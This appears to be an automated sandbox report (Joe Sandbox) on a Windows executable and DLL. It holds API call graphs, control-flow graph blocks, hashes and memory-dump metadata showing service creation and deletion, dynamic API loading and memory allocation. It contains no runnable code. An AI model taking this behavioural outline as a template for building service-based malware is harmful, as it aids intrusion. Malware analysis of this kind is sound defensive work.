MultiByteToWideChar 14122->14128 14228 140008300 14123->14228 14126 140008370 3 API calls 14125->14126 14129 140009d68 14126->14129 14128->14121 14128->14122 14132 140009d7d 14129->14132 14133 140009d70 FreeEnvironmentStringsA 14129->14133 14130 140009ce1 __CxxFrameHandler 14135 140009cef FreeEnvironmentStringsW 14130->14135 14131 140009cd1 FreeEnvironmentStringsW 14131->14121 14134 140009de5 FreeEnvironmentStringsA 14132->14134 14136 140009d90 MultiByteToWideChar 14132->14136 14133->14121 14134->14121 14135->14121 14136->14132 14137 140009e0e 14136->14137 14138 140008de0 _lock 2 API calls 14137->14138 14139 140009e16 FreeEnvironmentStringsA 14138->14139 14139->14121 14142 140009a03 14140->14142 14141 140008300 _lock 17 API calls 14143 140009bca 14141->14143 14142->14141 14142->14143 14143->14038 14145 1400096a8 14144->14145 14146 1400096b2 14144->14146 14145->14042 14147 140008370 3 API calls 14146->14147 14155 1400096fa 14147->14155 14148 140009709 14148->14042 14149 1400097a5 14150 140008de0 _lock 2 API calls 14149->14150 14151 1400097b4 14150->14151 14151->14042 14152 140008370 3 API calls 14152->14155 14153 1400097e5 14154 140008de0 _lock 2 API calls 14153->14154 14154->14151 14155->14148 14155->14149 14155->14152 14155->14153 14158 140008666 14156->14158 14159 1400086bf 14158->14159 14244 140005380 14158->14244 14159->14046 14161 140001565 14160->14161 14162 140001569 14161->14162 14163 14000157e 14161->14163 14282 140001430 GetModuleFileNameW OpenSCManagerW 14162->14282 14166 140001595 OpenSCManagerW 14163->14166 14167 14000164f 14163->14167 14170 1400015b2 GetLastError 14166->14170 14171 1400015cf OpenServiceW 14166->14171 14168 140001654 14167->14168 14169 140001669 StartServiceCtrlDispatcherW 14167->14169 14291 1400011f0 14168->14291 14169->14013 14170->14013 14172 140001611 DeleteService 14171->14172 14173 1400015e9 GetLastError CloseServiceHandle 14171->14173 14175 140001626 CloseServiceHandle CloseServiceHandle 14172->14175 14176 14000161e GetLastError 14172->14176 14173->14013 14175->14013 14176->14175 14179 14000f01e _lock 14178->14179 14180 14000f03b LoadLibraryA 14179->14180 14181 14000f125 _lock 14179->14181 14182 14000f054 GetProcAddress 14180->14182 14183 1400094c9 14180->14183 14195 14000f165 14181->14195 14201 1400073e0 LdrLoadDll 14181->14201 14182->14183 14184 14000f06d _lock 14182->14184 14183->14009 14189 14000f075 GetProcAddress 14184->14189 14185 1400073e0 _lock LdrLoadDll 14185->14183 14186 1400073e0 _lock LdrLoadDll 14193 14000f1e9 14186->14193 14191 140007220 _lock 14189->14191 14190 1400073e0 _lock LdrLoadDll 14190->14195 14192 14000f094 GetProcAddress 14191->14192 14194 14000f0b3 _lock 14192->14194 14196 1400073e0 _lock LdrLoadDll 14193->14196 14198 14000f1a3 _lock 14193->14198 14194->14181 14197 14000f0e9 GetProcAddress 14194->14197 14195->14186 14195->14198 14196->14198 14199 14000f101 _lock 14197->14199 14198->14185 14199->14181 14200 14000f10d GetProcAddress 14199->14200 14200->14181 14202 140007333 14201->14202 14202->14201 14203 140007403 14202->14203 14203->14190 14205 1400083a0 14204->14205 14207 1400083e0 14205->14207 14208 1400083be Sleep 14205->14208 14215 14000e850 14205->14215 14207->14086 14208->14205 14208->14207 14210 1400073e0 _lock LdrLoadDll 14209->14210 14211 14000edec _lock 14210->14211 14212 14000ee26 GetModuleHandleA 14211->14212 14213 14000ee1d _lock 14211->14213 14212->14213 14214 14000ee38 GetProcAddress 14212->14214 14213->14083 14214->14213 14216 14000e865 14215->14216 14217 14000e876 _lock 14216->14217 14218 14000e8be HeapAlloc 14216->14218 14220 1400090b0 14216->14220 14217->14205 14218->14216 14218->14217 14221 1400073e0 _lock LdrLoadDll 14220->14221 14222 1400090c5 14221->14222 14222->14216 14224 140008de9 HeapFree 14223->14224 14225 140008e19 _lock 14223->14225 14224->14225 14226 140008dff _lock 14224->14226 14225->14109 14227 140008e09 GetLastError 14226->14227 14227->14225 14231 140008320 14228->14231 14230 140008358 14230->14130 14230->14131 14231->14230 14232 140008338 Sleep 14231->14232 14233 1400090f0 14231->14233 14232->14230 14232->14231 14234 14000919e 14233->14234 14238 140009103 14233->14238 14235 1400090b0 _lock LdrLoadDll 14234->14235 14237 1400091a3 _lock 14235->14237 14236 14000914c HeapAlloc 14236->14238 14243 140009173 _lock 14236->14243 14237->14231 14238->14236 14239 140009540 _lock 12 API calls 14238->14239 14240 1400090b0 _lock LdrLoadDll 14238->14240 14241 140009300 _lock 10 API calls 14238->14241 14242 140008510 _lock 3 API calls 14238->14242 14238->14243 14239->14238 14240->14238 14241->14238 14242->14238 14243->14231 14247 140005250 14244->14247 14246 140005389 14246->14159 14248 140005271 14247->14248 14249 1400073e0 _lock LdrLoadDll 14248->14249 14250 14000527e 14249->14250 14251 1400073e0 _lock LdrLoadDll 14250->14251 14252 14000528d 14251->14252 14258 1400052f0 _lock 14252->14258 14259 140008490 14252->14259 14254 1400052b5 14256 1400052d9 14254->14256 14254->14258 14262 140008400 14254->14262 14257 140008400 7 API calls 14256->14257 14256->14258 14257->14258 14258->14246 14260 1400084c5 HeapSize 14259->14260 14261 140008499 _lock 14259->14261 14261->14254 14264 140008430 14262->14264 14265 140008450 Sleep 14264->14265 14266 140008472 14264->14266 14267 14000e920 14264->14267 14265->14264 14265->14266 14266->14256 14268 14000e935 14267->14268 14269 14000e94c 14268->14269 14279 14000e95e 14268->14279 14270 140008de0 _lock 2 API calls 14269->14270 14273 14000e951 14270->14273 14271 14000e9b1 14272 1400090b0 _lock LdrLoadDll 14271->14272 14275 14000e9b9 _lock 14272->14275 14273->14264 14274 14000e973 HeapReAlloc 14274->14275 14274->14279 14275->14264 14276 14000e9f4 _lock 14278 14000e9f9 GetLastError 14276->14278 14277 1400090b0 _lock LdrLoadDll 14277->14279 14278->14275 14279->14271 14279->14274 14279->14276 14279->14277 14280 14000e9db _lock 14279->14280 14281 14000e9e0 GetLastError 14280->14281 14281->14275 14283 140001482 CreateServiceW 14282->14283 14284 14000147a GetLastError 14282->14284 14286 1400014ea GetLastError 14283->14286 14287 1400014df CloseServiceHandle 14283->14287 14285 1400014fd 14284->14285 14297 140004f30 14285->14297 14288 1400014f2 CloseServiceHandle 14286->14288 14287->14288 14288->14285 14290 14000150d 14290->14013 14292 1400011fa 14291->14292 14306 1400051d0 14292->14306 14295 140004f30 sprintf_s NtAllocateVirtualMemory 14296 140001262 14295->14296 14296->14013 14299 140004f39 __CxxFrameHandler 14297->14299 14298 140004f44 14298->14290 14299->14298 14302 140006c95 14299->14302 14301 14000660e sprintf_s 14301->14290 14304 140006d7b 14302->14304 14305 140006d9d 14302->14305 14303 140006f95 NtAllocateVirtualMemory 14303->14305 14304->14303 14304->14305 14305->14301 14309 140008270 14306->14309 14308 140001238 MessageBoxW 14308->14295 14310 1400082ac _lock 14309->14310 14311 14000827e 14309->14311 14310->14308 14311->14310 14313 140008120 14311->14313 14314 14000816a 14313->14314 14317 14000813b _lock 14313->14317 14316 1400081d7 14314->14316 14314->14317 14319 140007f50 14314->14319 14316->14317 14318 140007f50 sprintf_s 54 API calls 14316->14318 14317->14310 14318->14317 14327 140007f69 sprintf_s 14319->14327 14320 140007f74 _lock 14320->14316 14321 14000801d 14322 1400080d5 14321->14322 14323 14000802f 14321->14323 14324 14000cc00 sprintf_s 54 API calls 14322->14324 14325 14000804c 14323->14325 14328 140008081 14323->14328 14330 140008056 14324->14330 14335 14000cc00 14325->14335 14327->14320 14327->14321 14332 14000cd50 14327->14332 14328->14330 14343 14000c2a0 14328->14343 14330->14316 14333 140008300 _lock 17 API calls 14332->14333 14334 14000cd6a 14333->14334 14334->14321 14336 14000cc23 _lock sprintf_s 14335->14336 14337 14000cc3f 14335->14337 14336->14330 14337->14336 14351 14000fc50 14337->14351 14341 14000ccc5 _lock sprintf_s 14396 14000fd20 LeaveCriticalSection 14341->14396 14344 14000c2e0 14343->14344 14348 14000c2c3 _lock sprintf_s 14343->14348 14345 14000fc50 sprintf_s 25 API calls 14344->14345 14344->14348 14346 14000c34e 14345->14346 14347 14000c1f0 sprintf_s 2 API calls 14346->14347 14349 14000c367 _lock sprintf_s 14346->14349 14347->14349 14348->14330 14430 14000fd20 LeaveCriticalSection 14349->14430 14352 14000fc96 14351->14352 14353 14000fccb 14351->14353 14397 14000b400 14352->14397 14354 14000ccac 14353->14354 14355 14000fccf EnterCriticalSection 14353->14355 14354->14341 14361 14000c3f0 14354->14361 14355->14354 14363 14000c42e 14361->14363 14380 14000c427 _lock sprintf_s 14361->14380 14362 140004f30 sprintf_s NtAllocateVirtualMemory 14364 14000cbe6 14362->14364 14367 14000c4fb __CxxFrameHandler sprintf_s 14363->14367 14363->14380 14424 14000c1f0 14363->14424 14364->14341 14366 14000c841 14368 14000c86a 14366->14368 14369 14000cb20 WriteFile 14366->14369 14367->14366 14370 14000c526 GetConsoleMode 14367->14370 14372 14000c936 14368->14372 14376 14000c876 14368->14376 14371 14000cb53 GetLastError 14369->14371 14369->14380 14370->14366 14373 14000c557 14370->14373 14371->14380 14378 14000c940 14372->14378 14386 14000ca02 14372->14386 14373->14366 14374 14000c564 GetConsoleCP 14373->14374 14374->14380 14391 14000c581 sprintf_s 14374->14391 14375 14000c8c5 WriteFile 14375->14376 14377 14000c928 GetLastError 14375->14377 14376->14375 14376->14380 14377->14380 14378->14380 14381 14000c991 WriteFile 14378->14381 14379 14000ca57 WideCharToMultiByte 14382 14000cb15 GetLastError 14379->14382 14379->14386 14380->14362 14381->14378 14383 14000c9f4 GetLastError 14381->14383 14382->14380 14383->14380 14384 14000cab0 WriteFile 14385 14000caf6 GetLastError 14384->14385 14384->14386 14385->14380 14385->14386 14386->14379 14386->14380 14386->14384 14387 14000fd50 7 API calls sprintf_s 14387->14391 14388 14000c649 WideCharToMultiByte 14388->14380 14389 14000c68c WriteFile 14388->14389 14389->14391 14392 14000c80d GetLastError 14389->14392 14390 14000c829 GetLastError 14390->14380 14391->14380 14391->14387 14391->14388 14391->14390 14393 14000c6e2 WriteFile 14391->14393 14395 14000c81b GetLastError 14391->14395 14392->14380 14393->14391 14394 14000c7ff GetLastError 14393->14394 14394->14380 14395->14380 14398 14000b41e 14397->14398 14399 14000b42f EnterCriticalSection 14397->14399 14403 14000b2f0 14398->14403 14401 14000b423 14401->14399 14402 1400084e0 _lock 12 API calls 14401->14402 14402->14399 14404 14000b317 14403->14404 14405 14000b32e 14403->14405 14406 140009540 _lock 12 API calls 14404->14406 14407 14000b342 _lock 14405->14407 14409 140008300 _lock 17 API calls 14405->14409 14408 14000b31c 14406->14408 14407->14401 14410 140009300 _lock 10 API calls 14408->14410 14411 14000b350 14409->14411 14412 14000b324 14410->14412 14411->14407 14413 14000b400 _lock 22 API calls 14411->14413 14414 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14412->14414 14415 14000b371 14413->14415 14414->14405 14416 14000b3a7 14415->14416 14417 14000b379 14415->14417 14418 140008de0 _lock HeapFree GetLastError 14416->14418 14419 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14417->14419 14423 14000b392 _lock 14418->14423 14420 14000b386 14419->14420 14422 140008de0 _lock HeapFree GetLastError 14420->14422 14420->14423 14421 14000b3b0 LeaveCriticalSection 14421->14407 14422->14423 14423->14421 14425 14000c20c sprintf_s 14424->14425 14426 14000c212 _lock 14425->14426 14427 14000c22c SetFilePointer 14425->14427 14426->14367 14428 14000c24a GetLastError 14427->14428 14429 14000c254 sprintf_s 14427->14429 14428->14429 14429->14367 13996 140006c95 13998 140006d7b 13996->13998 13999 140006d9d 13996->13999 13997 140006f95 NtAllocateVirtualMemory 13997->13999 13998->13997 13998->13999 14431 1400054e0 14432 140005506 _lock 14431->14432 14433 14000552c 14431->14433 14444 1400074d0 14433->14444 14436 140008370 3 API calls 14440 140005545 __CxxFrameHandler 14436->14440 14437 1400055b8 14438 140008de0 _lock 2 API calls 14437->14438 14439 1400055c0 sprintf_s 14438->14439 14439->14432 14440->14437 14448 1400074f0 14440->14448 14443 1400055b0 GetLastError 14443->14437 14446 140007333 14444->14446 14445 140005536 14445->14436 14446->14445 14447 1400073e0 LdrLoadDll 14446->14447 14447->14446 14451 140007333 14448->14451 14449 140005561 CreateThread 14449->14439 14449->14443 14450 1400073e0 LdrLoadDll 14450->14451 14451->14449 14451->14450

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 150 140006e96 147->150 151 140006e9b 147->151 149 140006edc-140006ee9 148->149 153 140006f89-140006f8e 149->153 154 140006eef-140006f23 149->154 150->132 151->146 157 140006f95-140006fd6 NtAllocateVirtualMemory 153->157 158 140006f90 153->158 155 140006f25-140006f2d 154->155 156 140006f2f-140006f33 154->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->149 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$@
                                                    • API String ID: 0-149943524
                                                    • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                    • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                    • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 274 140007341-1400073de 264->274 275 14000756c-1400075a2 264->275 270 1400074b4 265->270 271 140007480-1400074b3 265->271 267 1400074eb-14000752b 266->267 268 14000752c-140007535 266->268 267->268 272 140007552 268->272 273 140007537-140007554 268->273 270->268 271->270 272->260 273->264 274->256 275->260
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Load
                                                    • String ID:
                                                    • API String ID: 2234796835-0
                                                    • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                    • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                    • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: File$CreateReadmalloc
                                                    • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                    • API String ID: 3950102678-3381721293
                                                    • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                    • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                    • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 25 7ffda55d1c00-7ffda55d1c06 26 7ffda55d1c08-7ffda55d1c0b 25->26 27 7ffda55d1c41-7ffda55d1c4b 25->27 29 7ffda55d1c35-7ffda55d1c74 call 7ffda55d2470 26->29 30 7ffda55d1c0d-7ffda55d1c10 26->30 28 7ffda55d1d68-7ffda55d1d7d 27->28 33 7ffda55d1d8c-7ffda55d1da6 call 7ffda55d2304 28->33 34 7ffda55d1d7f 28->34 48 7ffda55d1c7a-7ffda55d1c8f call 7ffda55d2304 29->48 49 7ffda55d1d42 29->49 31 7ffda55d1c28 __scrt_dllmain_crt_thread_attach 30->31 32 7ffda55d1c12-7ffda55d1c15 30->32 40 7ffda55d1c2d-7ffda55d1c34 31->40 36 7ffda55d1c17-7ffda55d1c20 32->36 37 7ffda55d1c21-7ffda55d1c26 call 7ffda55d23b4 32->37 46 7ffda55d1ddb-7ffda55d1e0c call 7ffda55d2630 33->46 47 7ffda55d1da8-7ffda55d1dd9 call 7ffda55d242c call 7ffda55d22d4 call 7ffda55d27b4 call 7ffda55d25d0 call 7ffda55d25f4 call 7ffda55d245c 33->47 38 7ffda55d1d81-7ffda55d1d8b 34->38 37->40 57 7ffda55d1e1d-7ffda55d1e23 46->57 58 7ffda55d1e0e-7ffda55d1e14 46->58 47->38 60 7ffda55d1d5a-7ffda55d1d67 call 7ffda55d2630 48->60 61 7ffda55d1c95-7ffda55d1ca6 call 7ffda55d2374 48->61 52 7ffda55d1d44-7ffda55d1d59 49->52 64 7ffda55d1e65-7ffda55d1e6d call 7ffda55d1720 57->64 65 7ffda55d1e25-7ffda55d1e2f 57->65 58->57 63 7ffda55d1e16-7ffda55d1e18 58->63 60->28 75 7ffda55d1cf7-7ffda55d1d01 call 7ffda55d25d0 61->75 76 7ffda55d1ca8-7ffda55d1ccc call 7ffda55d2778 call 7ffda55d22c4 call 7ffda55d22e8 call 7ffda55d7b10 61->76 70 7ffda55d1f02-7ffda55d1f0f 63->70 77 7ffda55d1e72-7ffda55d1e7b 64->77 71 7ffda55d1e36-7ffda55d1e3c 65->71 72 7ffda55d1e31-7ffda55d1e34 65->72 78 7ffda55d1e3e-7ffda55d1e44 71->78 72->78 75->49 98 7ffda55d1d03-7ffda55d1d0f call 7ffda55d2620 75->98 76->75 127 7ffda55d1cce-7ffda55d1cd5 __scrt_dllmain_after_initialize_c 76->127 82 7ffda55d1eb3-7ffda55d1eb5 77->82 83 7ffda55d1e7d-7ffda55d1e7f 77->83 86 7ffda55d1e4a-7ffda55d1e5f call 7ffda55d1c00 78->86 87 7ffda55d1ef8-7ffda55d1f00 78->87 93 7ffda55d1ebc-7ffda55d1ed1 call 7ffda55d1c00 82->93 94 7ffda55d1eb7-7ffda55d1eba 82->94 83->82 91 7ffda55d1e81-7ffda55d1ea3 call 7ffda55d1720 call 7ffda55d1d68 83->91 86->64 86->87 87->70 91->82 122 7ffda55d1ea5-7ffda55d1eaa 91->122 93->87 108 7ffda55d1ed3-7ffda55d1edd 93->108 94->87 94->93 115 7ffda55d1d35-7ffda55d1d40 98->115 116 7ffda55d1d11-7ffda55d1d1b call 7ffda55d2538 98->116 113 7ffda55d1ee4-7ffda55d1ef2 108->113 114 7ffda55d1edf-7ffda55d1ee2 108->114 119 7ffda55d1ef4 113->119 114->119 115->52 116->115 126 7ffda55d1d1d-7ffda55d1d2b 116->126 119->87 122->82 126->115 127->75 128 7ffda55d1cd7-7ffda55d1cf4 call 7ffda55d7acc 127->128 128->75
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                    • String ID:
                                                    • API String ID: 190073905-0
                                                    • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction ID: 030d88ee8f052d777e638447d6baf7762fb5673959dac9b1ebfbd6256528a745
                                                    • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                    • Instruction Fuzzy Hash: DE819D2BF0A68FCAFA56EF6594613792690AF47F80F044035E90C477A7DE3CE8558718

                                                    Control-flow Graph

                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                    • String ID: WordpadFilter.db
                                                    • API String ID: 868324331-3647581008
                                                    • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction ID: d6621eeece0dbc710acb7ee6707ed5e11344b388319d92d07dd59d1a704a99ff
                                                    • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                    • Instruction Fuzzy Hash: A9315C37B16B85C9E701CFA1D8503AD73A5EB89B88F144535EE8D13B49EE38D161C344

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 196 7ffda55d11b0-7ffda55d1207 197 7ffda55d1209-7ffda55d1222 call 7ffda55e1490 196->197 198 7ffda55d124b-7ffda55d124e 196->198 207 7ffda55d1224-7ffda55d1227 197->207 208 7ffda55d123e 197->208 200 7ffda55d14b8-7ffda55d14bf 198->200 201 7ffda55d1254-7ffda55d1280 198->201 205 7ffda55d14c3-7ffda55d14ea call 7ffda55d1b70 200->205 203 7ffda55d12f6-7ffda55d1335 call 7ffda55d1b90 call 7ffda55e0a50 201->203 204 7ffda55d1282-7ffda55d128f 201->204 233 7ffda55d1340-7ffda55d13cb 203->233 210 7ffda55d1295-7ffda55d129c 204->210 211 7ffda55d14f1-7ffda55d14f6 call 7ffda55d1a40 204->211 213 7ffda55d1229-7ffda55d123c call 7ffda55e1490 207->213 214 7ffda55d1241-7ffda55d1246 207->214 208->214 217 7ffda55d12c7-7ffda55d12cf call 7ffda55d1b90 210->217 218 7ffda55d129e-7ffda55d12a5 210->218 224 7ffda55d14f7-7ffda55d14ff call 7ffda55d1110 211->224 213->207 213->208 214->198 231 7ffda55d12d2-7ffda55d12f1 call 7ffda55e0e10 217->231 223 7ffda55d12ab-7ffda55d12b3 call 7ffda55d1b90 218->223 218->224 234 7ffda55d12b9-7ffda55d12c5 223->234 235 7ffda55d14eb-7ffda55d14f0 call 7ffda55d79cc 223->235 231->203 233->233 237 7ffda55d13d1-7ffda55d13da 233->237 234->231 235->211 240 7ffda55d13e0-7ffda55d1402 237->240 241 7ffda55d1411-7ffda55d142c 240->241 242 7ffda55d1404-7ffda55d140e 240->242 241->240 244 7ffda55d142e-7ffda55d1436 241->244 242->241 245 7ffda55d1498-7ffda55d14a6 244->245 246 7ffda55d1438-7ffda55d143b 244->246 248 7ffda55d14b6 245->248 249 7ffda55d14a8-7ffda55d14b5 call 7ffda55d1bcc 245->249 247 7ffda55d1440-7ffda55d1449 246->247 250 7ffda55d144b-7ffda55d1453 247->250 251 7ffda55d1455-7ffda55d1465 247->251 248->205 249->248 250->251 253 7ffda55d1467-7ffda55d146e 251->253 254 7ffda55d1470-7ffda55d1496 251->254 253->254 254->245 254->247
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762619517.00007FFDA55D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFDA55D0000, based on PE: true
                                                    • Associated: 00000006.00000002.2762606188.00007FFDA55D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762636975.00007FFDA55E2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762652088.00007FFDA55ED000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762665882.00007FFDA55EF000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_7ffda55d0000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                    • String ID:
                                                    • API String ID: 73155330-0
                                                    • Opcode ID: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction ID: 52acbf1e1485903e3672c4087bfcd351f8559cc8d23f7817ea631a0eca8ec378
                                                    • Opcode Fuzzy Hash: c49bc023de0e2a92928f53e7c16b56888227e9b94bcb6080ad38a6f5ea522257
                                                    • Instruction Fuzzy Hash: FC812927F1A6CA89E612CF3598102B9A694EF57FC4F148335EE9957793EE3CE0918304
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000006.00000002.2762543719.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                    • Associated: 00000006.00000002.2762530072.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762563147.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762577657.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                    • Associated: 00000006.00000002.2762591692.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_6_2_140000000_sgH8Ps.jbxd
                                                    Similarity
                                                    • API ID: CriticalSection$EnterLeave$Heap$AllocProcesslstrlen
                                                    • String ID:
                                                    • API String ID: 3526400053-0
